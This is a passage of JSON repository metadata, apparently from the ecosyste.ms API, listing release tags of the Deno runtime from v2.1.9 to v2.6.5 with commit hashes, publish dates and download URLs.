eno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denolan